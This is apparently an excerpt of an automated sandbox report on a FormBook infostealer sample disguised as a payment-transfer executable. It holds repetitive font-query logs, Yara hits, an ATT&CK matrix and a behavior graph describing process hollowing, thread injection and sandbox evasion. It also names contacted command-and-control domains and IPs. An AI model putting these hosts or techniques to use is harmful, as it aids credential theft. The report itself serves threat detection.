          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 356535 Sample: Payment Transfer Copy of $2... Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 11 other signatures 2->42 10 Payment Transfer Copy of $274,876.00 for the invoice shipments.exe 3 2->10         started        process3 file4 28 Payment Transfer C...e shipments.exe.log, ASCII 10->28 dropped 52 Injects a PE file into a foreign processes 10->52 14 Payment Transfer Copy of $274,876.00 for the invoice shipments.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 jaemagreci.com 50.116.112.43, 49736, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 olgadalila.com 198.27.88.111, 49753, 80 OVHFR Canada 17->32 34 17 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 explorer.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe25%VirustotalBrowse
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe28%ReversingLabsByteCode-MSIL.Trojan.Wacatac
